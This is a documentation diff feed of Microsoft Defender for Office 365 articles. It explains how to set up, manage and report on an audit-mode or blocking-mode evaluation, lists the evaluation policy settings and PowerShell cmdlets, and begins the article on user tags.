- Your only option is to set up an evaluation of Defender for Office 365 on the **Microsoft Defender for Office 365 evaluation** page at <https://security.microsoft.com/atpEvaluation>. Furthermore, the evaluation is automatically set up in **Audit mode** (evaluation policies).
-
- Later, you can _convert_ to **blocking mode** (Standard preset security policy) using the [**Convert to standard** action on the **Microsoft Defender for Office 365 evaluation** page](#convert-to-standard-protection) or by [turning off the evaluation on the **Microsoft Defender for Office 365 evaluation** page](#manage-evaluation-settings) and then [configuring the Standard preset security policy](preset-security-policies.md#use-the-microsoft-defender-portal-to-assign-standard-and-strict-preset-security-policies-to-users).
-
- By definition, organizations with Defender for Office 365 Plan 2 don't require additional licenses to evaluate Defender for Office 365 Plan 2, so evaluations in these organizations are unlimited in duration.
-
-The information from the previous list is summarized in the following table:
-
-|Organization|Enroll from<br>the Trials page?|Enroll from<br>the Evaluation page?|Available modes|Evaluation<br>period|
-||::|::|||
-|Standalone EOP (no Exchange Online mailboxes) <br><br> Microsoft 365 E3|Yes|Yes|Audit mode <br><br> Blocking mode┬╣|90 days|
-|Defender for Office 365 Plan 1 <br><br> Microsoft 365 Business Premium|Yes|Yes|Audit mode <br><br> Blocking mode┬╣|90 days┬▓|
-|Microsoft 365 E5|No|Yes|Audit mode <br><br> Blocking mode┬╣ ┬│|Unlimited|
-
-┬╣ As [previously described](#audit-mode-vs-blocking-mode-for-defender-for-office-365), **blocking mode** (Standard preset security policy) isn't available if internet mail flows through a third-party protection service or device before delivery to Microsoft 365.
-
-┬▓ The security policies from **audit mode** (evaluation policies) or **blocking mode** (Standard preset security policy) don't expire or stop working after 90 days. The [automation, investigation, remediation, and education capabilities](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet) that are exclusive to Defender for Office 365 Plan 2 stop working after 90 days.
-
-┬│ The evaluation is set up in **audit mode** (evaluation policies). At any point after the setup is complete, you can _convert_ to **blocking mode** (Standard preset security policy) as described in [Convert to Standard protection](#convert-to-standard-protection).
-
-Now that you understand the differences between evaluations, trials, audit mode, and blocking mode, you're ready to set up your evaluation or trial as described in the next sections.
-
-## Set up an evaluation or trial in audit mode
-
-Remember, when you evaluate or try Defender for Office 365 in audit mode, special evaluation policies are created so Defender for Office 365 can detect threats. The settings of these evaluation policies are described in the [Policies in audit mode](#policies-in-audit-mode) section later in this article.
-
-1. Start the evaluation in any of the available locations in the Microsoft Defender portal at <https://security.microsoft.com>. For example:
- - On the banner at the top of any Defender for Office 365 feature page, select **Start free trial**.
- - On the **Microsoft 365 trials** page at <https://security.microsoft.com/trialHorizontalHub>, find and select **Defender for Office 365**.
- - On the **Microsoft Defender for Office 365 evaluation** page at <https://security.microsoft.com/atpEvaluation>, select **Start evaluation**.
-
-2. The **Turn on protection** dialog isn't available in organizations with Defender for Office 365 Plan 1 or Plan 2.
-
- In the **Turn on protection** dialog, select **No, I only want reporting**, and then select **Continue**.
-
-3. In the **Select the users you want to include** dialog, configure the following settings:
-
- - **All users**: This is the default and recommended option.
- - **Specific users**: If you select this option, you need to select the internal recipients that the evaluation applies to:
- - **Users**: The specified mailboxes, mail users, or mail contacts.
- - **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
- - **Domains**: All recipients in the organization with a primary email address in the specified [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).
-
- Click in the box, start typing a value, and select the value from the results below the box. Repeat this process as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value in the box.
-
- For users or groups, you can use most identifiers (name, display name, alias, email address, account name, etc.), but the corresponding display name is shown in the results. For users, enter an asterisk (\*) by itself to see all available values.
-
- You can use a recipient condition only once, but the condition can contain multiple values:
-
- - Multiple **values** of the **same condition** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy is applied to them.
- - Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
- When you're finished in the **Select the users you want to include** dialog, select **Continue**.
-
-4. In the **Help us understand your mail flow** dialog, configure the following options:
-
- - One of the following options is automatically selected based on our detection of the MX record for your domain:
-
- - **I'm using a third-party and/or on-premises service provider**: The MX record for your domain points somewhere other than Microsoft 365. Verify or configure the following settings:
- - **Third party service your organization is using**: Verify or select one of the following values:
- - **Other**: This value also requires information in **If your email messages pass through multiple gateways, list each gateway IP address**, which is available only for the value **Other**. Use this value if you're using an on-premises service provider.
-
- Enter a comma-separated list of the IP addresses that are used by the third-party protection service or device to send mail into Microsoft 365.
-
- - **Barracuda**
- - **IronPort**
- - **Mimecast**
- - **Proofpoint**
- - **Sophos**
- - **Symantec**
- - **Trend Micro**
-
- - **The connector to apply this evaluation to**: Select the connector that's used for mail flow into Microsoft 365.
-
- [Enhanced Filtering for Connectors](/exchange/mail-flow-best-practices/use-connectors-to-configure-mail-flow/enhanced-filtering-for-connectors) (also known as _skip listing_) is automatically configured on the connector that you specify.
-
- When a third-party service or device sits in front of email flowing into Microsoft 365, Enhanced Filtering for Connectors correctly identifies the source of internet messages and greatly improves the accuracy of the Microsoft filtering stack (especially [spoof intelligence](anti-phishing-protection-spoofing-about.md), as well as post-breach capabilities in [Threat Explorer](threat-explorer-real-time-detections-about.md) and [Automated Investigation & Response (AIR)](air-about.md).
-
- - **I'm only using Microsoft Exchange Online**: The MX records for your domain point to Microsoft 365. There's nothing left to configure, so select **Finish**.
-
- - **Share data with Microsoft**: This option isn't selected by default, but you can select the check box if you like.
-
- When you're finished in the **Help us understand your mail flow** dialog, select **Finish**.
-
-5. When set up is complete, you get a **Let us show you around** dialog. Select **Start tour** or **Dismiss**.
-
-## Set up an evaluation or trial in blocking mode
-
-Remember, when you try Defender for Office 365 in **blocking mode**, the Standard preset security is turned on and the specified users (some or everyone) are included in the Standard preset security policy. For more information about the Standard preset security policy, see [Preset security policies](preset-security-policies.md).
-
-1. Start the trial in any of the available locations in the Microsoft Defender portal at <https://security.microsoft.com>. For example:
- - On the banner at the top of any Defender for Office 365 feature page, select **Start free trial**.
- - On the **Microsoft 365 trials** page at <https://security.microsoft.com/trialHorizontalHub>, find and select **Defender for Office 365**.
- - On the **Microsoft Defender for Office 365 evaluation** page at <https://security.microsoft.com/atpEvaluation>, select **Start evaluation**.
-
-2. The **Turn on protection** dialog isn't available in organizations with Defender for Office 365 Plan 1 or Plan 2.
-
- In the **Turn on protection** dialog, select **Yes, protect my organization by blocking threats**, and then select **Continue**.
-
-3. In the **Select the users you want to include** dialog, configure the following settings:
-
- - **All users**: This is the default and recommended option.
- - **Select users**: If you select this option, you need to select the internal recipients that the trial applies to:
- - **Users**: The specified mailboxes, mail users, or mail contacts.
- - **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
- - **Domains**: All recipients in the organization with a primary email address in the specified [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).
-
- Click in the box, start typing a value, and select the value from the results below the box. Repeat this process as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the value in the box.
-
- For users or groups, you can use most identifiers (name, display name, alias, email address, account name, etc.), but the corresponding display name is shown in the results. For users, enter an asterisk (\*) by itself to see all available values.
-
- You can use a recipient condition only once, but the condition can contain multiple values:
-
- - Multiple **values** of the **same condition** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy is applied to them.
- - Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
- When you're finished in the **Select the users you want to include** dialog, select **Continue**.
-
-4. A progress dialog appears as your evaluation is set up. When setup is complete, select **Done**.
-
-## Manage your evaluation or trial of Defender for Office 365
-
-After you set up your evaluation or trial in **audit mode**, the **Microsoft Defender for Office 365 evaluation** page at <https://security.microsoft.com/atpEvaluation> is your central location for the results of trying Defender for Office 365 Plan 2.
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Threat policies** \> select **Evaluation mode** in the **Others** section. Or, to go directly to the **Microsoft Defender for Office 365 evaluation** page, use <https://security.microsoft.com/atpEvaluation>.
-
-The actions that are available on the **Microsoft Defender for Office 365 evaluation** page are described in the following subsections.
-
-### Manage evaluation settings
-
-On the **Microsoft Defender for Office 365 evaluation** page at <https://security.microsoft.com/atpEvaluation>, select **Manage evaluation settings**.
-
-In the **Manage MDO evaluation settings** flyout that opens, the following information and settings are available:
--- Whether the evaluation is on is shown at the top of the flyout (**Evaluation on** or **Evaluation off**). This information is also available on the **Microsoft Defender for Office 365 evaluation** page.-
- The :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** or **Turn on** action allows you to turn off or turn on the evaluation policies.
--- How many days are left in the evaluation is shown at the top of the flyout (**nn days remaining**).--- **Detection capabilities** section: Use the toggles to turn on or turn off the following Defender for Office 365 protections:
- - **Safe Links**
- - **Safe Attachments**
- - **Anti-phishing**
--- **Users, groups, and domains** section: Select **Edit users, groups, and domains** to change who the evaluation or trial applies to as described earlier in [Set up an evaluation or trial in audit mode](#set-up-an-evaluation-or-trial-in-audit-mode).--- **Impersonation settings** section:
- - If impersonation protection isn't configured in the anti-phishing evaluation policy, select **Apply impersonation protection** to configure impersonation protection:
- - Internal and external users (senders) for user impersonation protection.
- - Custom domains for domain impersonation protection.
- - Trusted senders and domains to exclude from impersonation protection.
-
- The steps are essentially the same as described in the **Impersonation** section in Step 5 at [Use the Microsoft Defender portal to create anti-phishing policies](anti-phishing-policies-mdo-configure.md#use-the-microsoft-defender-portal-to-create-anti-phishing-policies).
-
- - If impersonation protection is configured in the anti-phishing evaluation policy, this section shows the impersonation protection settings for:
- - **User impersonation protection**
- - **Domain impersonation protection**
- - **Trusted impersonated senders and domains**
-
- To modify the settings, select **Edit impersonation settings**.
-
-When you're finished in the **Manage MDO evaluation settings** flyout, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: **Close**.
-
-### Convert to Standard protection
-
-For your evaluation or trial, you can switch from **audit mode** (evaluation policies) to **blocking mode** (Standard preset security policy) using either of the following methods:
--- <u>On the **Microsoft Defender for Office 365 evaluation** page</u>: Select **Convert to standard protection**-- <u>In the **Manage MDO evaluation settings** flyout</u>: On the **Microsoft Defender for Office 365 evaluation** page, select **Manage evaluation settings**. In the details flyout that opens, select :::image type="icon" source="../../media/m365-cc-sc-convert-to-std-prot-icon.png" border="false"::: **Convert to standard protection**.-
-After you select **Convert to standard protection**, read the information in the dialog that opens, and then select **Continue**.
-
-You're taken to the **Apply standard protection** wizard on the **Preset security policies** page. The list of recipients that are included and excluded from the evaluation or trial are copied into the Standard preset security policy. For more information, see [Use the Microsoft Defender portal to assign Standard and Strict preset security policies to users](preset-security-policies.md#use-the-microsoft-defender-portal-to-assign-standard-and-strict-preset-security-policies-to-users).
--- The security policies in the Standard preset security policy have a higher priority than the evaluation policies, which means the policies in the Standard preset security are always applied _before_ the evaluation policies, even if both are present and turned on.-- There's no automatic way to go from **blocking mode** to **audit mode**. The manual steps are:
- 1. Turn off the Standard preset security policy on the **Preset security policies** page at <https://security.microsoft.com/presetSecurityPolicies>.
- 2. On the **Microsoft Defender for Office 365 evaluation** page at <https://security.microsoft.com/atpEvaluation>, verify the value **Evaluation on** is shown.
-
- If **Evaluation off** is shown, select **Manage evaluation settings**. In the **Manage MDO evaluation settings** flyout that opens, select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on**.
-
- 3. Select **Manage evaluation settings** to verify the users that the evaluation applies to in the **Users, groups, and domains** section in the **Manage MDO evaluation settings** details flyout that opens.
-
-## Reports for your evaluation or trial of Defender for Office 365
-
-This section describes the reports that are available in **audit mode** and **blocking mode**.
-
-### Reports for blocking mode
-
-No special reports are created for **blocking mode**, so use the standard reports that are available in Defender for Office 365. Specifically, you're looking for reports that apply only to Defender for Office 365 features (for example, Safe Links or Safe Attachments) or reports that can be filtered by Defender for Office 365 detections as described in the following list:
--- The [Mailflow view for the Mailflow status report](reports-email-security.md#mailflow-view-for-the-mailflow-status-report):
- - Messages detected as user impersonation or domain impersonation by anti-phishing policies appear in **Impersonation block**.
- - Messages detected during file or URL detonation by Safe Attachments policies or Safe Links policies appear in **Detonation block**.
--- The [Threat protection status report](reports-email-security.md#threat-protection-status-report):-
- You can filter many of the views in the Threat protection status report by the **Protected by** value **MDO** to see the effects of Defender for Office 365.
-
- - [View data by Overview](reports-email-security.md#view-data-by-overview)
-
- - [View data by Email \> Phish and Chart breakdown by Detection Technology](reports-email-security.md#view-data-by-email--phish-and-chart-breakdown-by-detection-technology)
- - Messages detected by [campaigns](campaigns.md) appear in **Campaign**.
- - Messages detected by Safe Attachments appear in **File detonation** and **File detonation reputation**.
- - Messages detected by user impersonation protection in anti-phishing policies appear in **Impersonation domain**, **Impersonation user**, and **Mailbox intelligence impersonation**.
- - Messages detected by Safe Links appear in **URL detonation** and **URL detonation reputation**.
-
- - [View data by Email \> Malware and Chart breakdown by Detection Technology](reports-email-security.md#view-data-by-email--malware-and-chart-breakdown-by-detection-technology)
- - Messages detected by [campaigns](campaigns.md) appear in **Campaign**.
- - Messages detected by Safe Attachments appear in **File detonation** and **File detonation reputation**.
- - Messages detected by Safe Links appear in **URL detonation** and **URL detonation reputation**.
-
- - [View data by Email \> Spam and Chart breakdown by Detection Technology](reports-email-security.md#view-data-by-email--spam-and-chart-breakdown-by-detection-technology)
-
- Messages detected by Safe Links appear in **URL malicious reputation**.
-
- - [Chart breakdown by Policy type](reports-email-security.md#chart-breakdown-by-policy-type)
-
- Messages detected by Safe Attachments appear in **Safe Attachments**
-
- - [View data by Content \> Malware](reports-email-security.md#view-data-by-content--malware)
-
- Malicious files detected by [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md) appear in **MDO detonation**.
--- The [Top senders and recipients report](reports-email-security.md#top-senders-and-recipients-report)-
- **Show data for Top malware recipients (MDO)** and **Show data for Top phish recipients (MDO)**.
--- The [URL protection report](reports-defender-for-office-365.md#url-protection-report)-
-### Reports for audit mode
-
-In **audit mode**, you're looking for reports that show detections by the evaluation policies as described in the following list:
--- The [Email entity page](mdo-email-entity-page.md) shows the following banner in message detection details on the **Analysis** tab for **Bad attachment**, **spam url + malware**, **Phish url**, and **impersonation** messages that were detected by the Defender for Office 365 evaluation:-
- :::image type="content" source="../../media/evalv2-detection-banner.png" alt-text="Notification banner in message details that the Defender for Office 365 evaluation detected a malicious email message." lightbox="../../media/evalv2-detection-banner.png":::
--- The **Microsoft Defender for Office 365 evaluation** page at <https://security.microsoft.com/atpEvaluation> consolidates the detections from the standard reports that are available in Defender for Office 365. The reports on this page are primarily filtered by **Evaluation: Yes** to show detections by the evaluation policies only, but most reports also use additional clarifying filters.-
- By default, the report summaries on the page show data for the last 30 days, but you can filter the date range by selecting :::image type="icon" source="../../media/m365-cc-sc-add-internal-icon.png" border="false"::: **30 days** and selecting from following additional values that are less than 30 days:
-
- - **24 hours**
- - **7 days**
- - **14 days**
- - **Custom date range**
-
- The date range filter affects the data that's displayed in the report summaries on the page and in the main report when you select **View details** in a card.
-
- Select :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Download** to download the chart data to a .csv file.
-
- - The following reports on the **Microsoft Defender for Office 365 evaluation** page contain filtered information from specific views in the [Threat protection status report](reports-email-security.md#threat-protection-status-report):
- - **Email links**:
- - Report view: [View data by Email \> Phish and Chart breakdown by Detection Technology](reports-email-security.md#view-data-by-email--phish-and-chart-breakdown-by-detection-technology)
- - **Detection** filters: **URL detonation reputation** and **URL detonation**.
- - **Attachments in email**:
- - Report view: [View data by Email \> Phish and Chart breakdown by Detection Technology](reports-email-security.md#view-data-by-email--phish-and-chart-breakdown-by-detection-technology)
- - **Detection** filters: **File detonation** and **File detonation reputation**.
- - **Impersonation**
- - Report view: [View data by Email \> Phish and Chart breakdown by Detection Technology](reports-email-security.md#view-data-by-email--phish-and-chart-breakdown-by-detection-technology)
- - **Detection** filters: **Impersonation user**, **Impersonation domain**, and **Mailbox intelligence impersonation**.
- - **Attachment links**
- - Report view: [View data by Email \> Malware and Chart breakdown by Detection Technology](reports-email-security.md#view-data-by-email--malware-and-chart-breakdown-by-detection-technology)
- - **Detection** filters: **URL detonation** and **URL detonation reputation**.
- - **Embedded malware**
- - Report view: [View data by Email \> Malware and Chart breakdown by Detection Technology](reports-email-security.md#view-data-by-email--malware-and-chart-breakdown-by-detection-technology)
- - **Detection** filters: **File detonation** and **File detonation reputation**.
- - **Spoofed senders**:
- - Report view: [View data by Email \> Phish and Chart breakdown by Detection Technology](reports-email-security.md#view-data-by-email--phish-and-chart-breakdown-by-detection-technology)
- - **Detection** filters: **Spoof intra-org**, **Spoof external domain**, and **Spoof DMARC**.
-
- - **Real-time URL click protection** uses the [View data by URL click protection action in the URL protection report](reports-defender-for-office-365.md#view-data-by-url-click-protection-action-in-the-url-protection-report) that's filtered by **Evaluation: Yes**.
-
- Although the [View data by URL click by application in the URL protection report](reports-defender-for-office-365.md#view-data-by-url-click-by-application-in-the-url-protection-report) isn't shown on the **Microsoft Defender for Office 365 evaluation** page, it's also filterable by **Evaluation: Yes**.
-
-## Required permissions
-
-The following permissions are required in [Microsoft Entra ID](/entra/identity/role-based-access-control/manage-roles-portal) to set up an evaluation or trial of Defender for Microsoft 365:
--- _Create, modify or delete an evaluation or trial_: Membership in the **Security Administrator** or **Global Administrator** roles.-- _View evaluation policies and reports in audit mode_: Membership in the **Security Administrator** or **Security Reader** roles.-
-For more information about Microsoft Entra permissions in the Microsoft Defender portal, see [Microsoft Entra roles in the Microsoft Defender portal](mdo-portal-permissions.md#microsoft-entra-roles-in-the-microsoft-defender-portal)
-
-## Frequently asked questions
-
-### Q: Do I need to manually get or activate trial licenses?
-
-A: No. The trial automatically provisions Defender for Office 365 Plan 2 licenses if you need them as previously described.
-
-### Q: How do I extend the trial?
-
-A: See [Extend your trial](/microsoft-365/commerce/try-or-buy-microsoft-365#extend-your-trial).
-
-### Q: What happens to my data after the trial expires?
-
-A: After your trial expires, you have access to your trial data (data from features in Defender for Office 365 that you didn't have previously) for 30 days. After this 30 day period, all policies and data that were associated with the Defender for Office 365 trial are deleted.
-
-### Q: How many times can I use the Defender for Office 365 trial in my organization?
-
-A: A maximum of two times. If your first trial expires, you need to wait at least 30 days after the expiration date before you can enroll in the Defender for Office 365 trial again. After your second trial, you can't enroll in another trial.
-
-### Q: In audit mode, are there scenarios where Defender for Office 365 acts on messages?
-
-A: Yes. For the protection of the service, no one in any program or SKU can turn off or bypass taking action on messages that are classified as malware or high confidence phishing by the service.
-
-### Q: In what order are policies evaluated?
-
-A: See [Order of precedence for preset security policies and other policies](preset-security-policies.md#order-of-precedence-for-preset-security-policies-and-other-policies).
-
-## Policy settings associated with Defender for Office 365 evaluations and trials
-
-### Policies in audit mode
-
-> [!WARNING]
-> Do not attempt to create, modify, or remove the individual security policies that are associated with the evaluation of Defender for Office 365. The only supported method for creating the individual security policies for the evaluation is to start the evaluation or trial in audit mode in the Microsoft Defender portal for the first time.
-
-[As previously described](#audit-mode-vs-blocking-mode-for-defender-for-office-365), when you choose audit mode for your evaluation or trial, evaluation policies with the required settings to observe but not take action on messages are automatically created.
-
-To see these policies and their settings, run the following command in [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell):
-
-```powershell
-Write-Output -InputObject ("`r`n"*3),"Evaluation anti-phishing policy",("-"*79);Get-AntiPhishPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Evaluation"; Write-Output -InputObject ("`r`n"*3),"Evaluation Safe Attachments policy",("-"*79);Get-SafeAttachmentPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Evaluation"; Write-Output -InputObject ("`r`n"*3),"Evaluation Safe Links policy",("-"*79);Get-SafeLinksPolicy | Where-Object -Property RecommendedPolicyType -eq -Value "Evaluation"
-```
-
-The settings are also described in the following tables.
-
-#### Anti-phishing evaluation policy settings
-
-|Setting|Value|
-|||
-|Name|Evaluation Policy|
-|AdminDisplayName|Evaluation Policy|
-|AuthenticationFailAction|MoveToJmf|
-|DmarcQuarantineAction|Quarantine|
-|DmarcRejectAction|Reject|
-|Enabled|True|
-|EnableFirstContactSafetyTips|False|
-|EnableMailboxIntelligence|True|
-|EnableMailboxIntelligenceProtection|True|
-|EnableOrganizationDomainsProtection|False|
-|EnableSimilarDomainsSafetyTips|False|
-|EnableSimilarUsersSafetyTips|False|
-|EnableSpoofIntelligence|True|
-|EnableSuspiciousSafetyTip|False|
-|EnableTargetedDomainsProtection|False|
-|EnableTargetedUserProtection|False|
-|EnableUnauthenticatedSender|True|
-|EnableUnusualCharactersSafetyTips|False|
-|EnableViaTag|True|
-|ExcludedDomains|{}|
-|ExcludedSenders|{}|
-|HonorDmarcPolicy|True|
-|ImpersonationProtectionState|Manual|
-|IsDefault|False|
-|MailboxIntelligenceProtectionAction|NoAction|
-|MailboxIntelligenceProtectionActionRecipients|{}|
-|MailboxIntelligenceQuarantineTag|DefaultFullAccessPolicy|
-|PhishThresholdLevel|1|
-|PolicyTag|blank|
-|RecommendedPolicyType|Evaluation|
-|SpoofQuarantineTag|DefaultFullAccessPolicy|
-|TargetedDomainActionRecipients|{}|
-|TargetedDomainProtectionAction|NoAction|
-|TargetedDomainQuarantineTag|DefaultFullAccessPolicy|
-|TargetedDomainsToProtect|{}|
-|TargetedUserActionRecipients|{}|
-|TargetedUserProtectionAction|NoAction|
-|TargetedUserQuarantineTag|DefaultFullAccessPolicy|
-|TargetedUsersToProtect|{}|
-
-#### Safe Attachments evaluation policy settings
-
-|Setting|Value|
-|||
-|Name|Evaluation Policy|
-|Action|Allow|
-|ActionOnError|True<sup>\*</sup>|
-|AdminDisplayName|Evaluation Policy|
-|ConfidenceLevelThreshold|80|
-|Enable|True|
-|EnableOrganizationBranding|False|
-|IsBuiltInProtection|False|
-|IsDefault|False|
-|OperationMode|Delay|
-|QuarantineTag|AdminOnlyAccessPolicy|
-|RecommendedPolicyType|Evaluation|
-|Redirect|False|
-|RedirectAddress|blank|
-|ScanTimeout|30|
-
-<sup>\*</sup> This parameter has been deprecated and is no longer used.
-
-#### Safe Links evaluation policy settings
-
-|Setting|Value|
-|||
-|Name|Evaluation Policy|
-|AdminDisplayName|Evaluation Policy|
-|AllowClickThrough|True|
-|CustomNotificationText|blank|
-|DeliverMessageAfterScan|True|
-|DisableUrlRewrite|True|
-|DoNotRewriteUrls|{}|
-|EnableForInternalSenders|False|
-|EnableOrganizationBranding|False|
-|EnableSafeLinksForEmail|True|
-|EnableSafeLinksForOffice|True|
-|EnableSafeLinksForTeams|True|
-|IsBuiltInProtection|False|
-|LocalizedNotificationTextList|{}|
-|RecommendedPolicyType|Evaluation|
-|ScanUrls|True|
-|TrackClicks|True|
-
-#### Use PowerShell to configure recipient conditions and exceptions to the evaluation or trial in audit mode
-
-A rule that's associated with the Defender for Office 365 evaluation policies controls the recipient conditions and exceptions to the evaluation.
-
-To view the rule that's associated with the evaluation, run the following command in Exchange Online PowerShell:
-
-```powershell
-Get-ATPEvaluationRule
-```
-
-To use Exchange Online PowerShell to modify who the evaluation applies to, use the following syntax:
-
-```powershell
-Set-ATPEvaluationRule -Identity "Evaluation Rule" -SentTo <"user1","user2",... | $null> -ExceptIfSentTo <"user1","user2",... | $null> -SentToMemberOf <"group1","group2",... | $null> -ExceptIfSentToMemberOf <"group1","group2",... | $null> -RecipientDomainIs <"domain1","domain2",... | $null> -ExceptIfRecipientDomainIs <"domain1","domain2",... | $null>
-```
-
-This example configures exceptions from the evaluation for the specified security operations (SecOps) mailboxes.
-
-```powershell
-Set-ATPEvaluationRule -Identity "Evaluation Rule" -ExceptIfSentTo "SecOps1","SecOps2"
-```
-
-#### Use PowerShell to turn on or turn off the evaluation or trial in audit mode
-
-To turn on or turn off the evaluation in audit mode, you enable or disable the rule that's associated with the evaluation. The State property value of the evaluation rule shows whether the rule is Enabled or Disabled.
-
-Run the following command to determine whether the evaluation is currently enabled or disabled:
-
-```powershell
-Get-ATPEvaluationRule -Identity "Evaluation Rule" | Format-Table Name,State
-```
-
-Run the following command to turn off the evaluation if it's turned on:
-
-```powershell
-Disable-ATPEvaluationRule -Identity "Evaluation Rule"
-```
-
-Run the following command to turn on the evaluation if it's turned off:
-
-```powershell
-Enable-ATPEvaluationRule -Identity "Evaluation Rule"
-```
-
-### Policies in blocking mode
-
-As previously described, **blocking mode** policies are created using the Standard template for [preset security policies](preset-security-policies.md).
-
-To use Exchange Online PowerShell to view the individual security policies that are associated with the Standard preset security policy, and to view and configure the recipient conditions and exceptions for the preset security policy, see [Preset security policies in Exchange Online PowerShell](preset-security-policies.md#preset-security-policies-in-exchange-online-powershell).
security User Tags About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/user-tags-about.md
- Title: User tags in Microsoft Defender for Office 365
- - NOCSH
--- Previously updated : 11/2/2023-
- - MET150
-
- - m365-security
- - tier2
-
-description: Admins can learn how to identify specific groups of users with user tags in Microsoft Defender for Office 365 Plan 2. Tag filtering is available across alerts, reports, and investigations in Microsoft Defender for Office 365 to quickly identify the tagged users.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# User tags in Microsoft Defender for Office 365
--
-_User tags_ are identifiers for specific groups of users in [Microsoft Defender for Office 365](mdo-about.md). There are two types of user tags:
--- **System tags**: Currently, [Priority account](/microsoft-365/admin/setup/priority-accounts) is the only type of system tag.-- **Custom tags**: You create these types of tags.-
-If your organization has Defender for Office 365 Plan 2 (included in your subscription or as an add-on), you can create custom user tags in addition to using the Priority account tag.
-
-> [!NOTE]
-> Currently, you can only apply user tags to mailbox users.
->
-> Your organization can tag a maximum of 250 users using the Priority account system tag.
->
-> Each custom tag has a maximum of 10,000 users per tag and your organization can create up to 500 custom tags.
-
-This article explains how to configure user tags in the Microsoft Defender portal. You can also apply or remove the Priority account tag using the _VIP_ parameter on the [Set-User](/powershell/module/exchange/set-user) cmdlet in [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell). No PowerShell cmdlets are available to manage custom user tags.
-
-To see how user tags are part of the strategy to help protect high-impact user accounts, see [Security recommendations for priority accounts in Microsoft 365](priority-accounts-security-recommendations.md).
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **User tags** page, use <https://security.microsoft.com/securitysettings/userTags>.--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/System settings/manage** or **Authorization and settings/System settings/Read-only**.
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md):
- - _Create, modify, and delete custom user tags_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _Apply and remove the Priority account tag from users_: Membership in the **Security Administrator** and **Exchange Admin** role groups.
- - _Apply and remove existing custom user tags from users_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator** and **Security Administrator** roles gives users the required permissions *and* permissions for other features in Microsoft 365.
-
- > [!NOTE]
- > User tag management is controlled by the **Tag Reader** and **Tag Manager** roles.
--- You can also manage and monitor the Priority account tag in the Microsoft 365 admin center. For instructions, see [Manage and monitor priority accounts](/microsoft-365/admin/setup/priority-accounts).--- For information about securing _privileged accounts_ (admin accounts), see [this article](/purview/privileged-access-management).-
-## Use the Microsoft Defender portal to create user tags
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Settings** \> **Email & collaboration** \> **User tags**. Or, to go directly to the **User tags** page, use <https://security.microsoft.com/securitysettings/userTags>.
-
-2. On the **User tags** page, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create** to start the new tag wizard.
-
-3. On the **Define tag** page, configure the following settings:
- - **Name**: Enter a unique, descriptive name for the tag. You can't rename a tag after you create it.
- - **Description**: Enter an optional description for the tag.
-
- When you're finished on the **User tags** page, select **Next**.
-
-4. On the **Assign members** page, do either of the following steps:
-
- - Select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add members**. In the **Add members** flyout that opens, do any of the following steps to add individual users or groups in the **Search users and groups to add** box:
- - Click in the box and scroll through the list to select a user or group.
- - Click in the box, start typing a name to filter the list, and then select the value below the box.select a user or group.
-
- To add more members, click in an empty area in the box and repeat the previous step.
-
- To remove individual entries from the box, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the entry.
-
- To remove all entries, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: in the **Selected nn users and nn groups** item below the box.
-
- When you're finished on the **Add members** flyout, select **Add**.
-
